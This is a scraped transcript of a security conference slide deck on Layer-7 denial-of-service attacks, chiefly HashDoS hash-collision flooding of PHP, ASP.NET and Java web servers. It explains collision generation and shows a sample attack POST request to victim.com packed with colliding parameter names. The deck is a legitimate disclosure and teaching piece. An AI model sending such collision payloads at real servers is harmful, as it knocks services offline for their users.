1 / 20

Layer-7 DoS Hash Collisions

Layer-7 DoS Hash Collisions. About Hybrid Security. Provide cyber fraud protection to websites Prevent business logic attacks on web applications Heuristic web user behavior analysis Signature-free 0-day attack detection.

margo
Download Presentation

Layer-7 DoS Hash Collisions

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Layer-7 DoS Hash Collisions

  2. About Hybrid Security • Provide cyber fraud protection to websites • Prevent business logic attacks on web applications • Heuristic web user behavior analysis • Signature-free 0-day attack detection

  3. Slowloris: Written by RSnake, exploits slow HTTP headers • R.U.Dead.Yet: Written by Raviv Raz, exploits slow POST fields • Keep-Dead: Written by Esrun, exploits long Keep-Alive sessions Layer-7 DoS

  4. HashDoS – Advisory published by Julian Wäld & Alexander Klink, Dec. 28, 2011 • Vulnerability in ASP.NET (MS11-100) • Vulnerability in PHP 4 and 5 • Also vulnerable:Java, Tomcat, Python, Ruby, Oracle Hash DoS

  5. login=root passwd=123 Hash Tables Hash Key Insert, search, delete node with O(n) complexity

  6. EzEz=123 EzFY=123 FYEz=123 Hash Collisions Hash Key When h(Ez) = h(FY)… Insert, search, delete node become O(n²) complexity

  7. DJBX33A Hashing • Daniel J. Bernsetin, 33 additions • Used in 32 bit PHP 5, Java Tomcat • Similar function used in Ruby

  8. Hashing With the Pigeons • Apparently, a non-injective function • More commonly known as the pigeonhole principle Strings Hashes

  9. DJBX33X Hashing • Daniel J. Bernsetin, 33 XORs • Used in 32/64 bit PHP 4 & ASP.NET • Similar function used in Python

  10. Linear Collision Generation h('Ey') = 31¹ · 69 + 31° · 121 = 2260 h('FZ') = 31¹ · 70 + 31° · 90 = 2260 h('Eya') = 31 · (31¹ · 69 + 31° · 121) + 31°·97 = 31 · (31¹ · 70 + 31° · 90) + 31°·97 = h('FZa')

  11. DEMO

  12. Using Binary Permutations h('EzEz')  (00) = h('EzFY')  (01) = h('FYEz')  (10) = h('FYFY')  (11)

  13. Pre-computing rainbow tables • Calculate long permutations of colliding char pairs • Create many same-hash field names for POST • More advanced Meet-In-The-Middle techniques improve rainbow table creation exponentially

  14. PHP 5 • DJBX33X • 1 Gbit speed keeps ~ 10,000 i7 core CPU busy • POST limited by 8 MB • POST limited by max_input_time (default on Ubuntu/BSD = 60 seconds)

  15. <? php echo$_POST["param"]; ?>

  16. DJBX33X • Breakable using Meet-In-The-Middle • 30 kbits/sec keeps 1 core-2 CPU busy • With 1 Gbit keeps ~ 30,000 core-2 CPU busy

  17. <% Response.Write Request.Form['param']; %>

  18. POST http://victim.com/ Host: victim.com Connection: keep-alive Content-Length: 1000000 User-Agent: Mozilla/5.0 Cookie: __utmz=181569312.1294666144.1.1 EzEzEzEzEzEzEzEz=&EzEzEzEzEzEzEzFY=& EzEzEzEzEzEzEzG8=&EzEzEzEzEzEzEzH%17=&…

  19. PoC already in the wild

  20. Thank You raviv@hybridsec.com http://www.hybridsec.com

More Related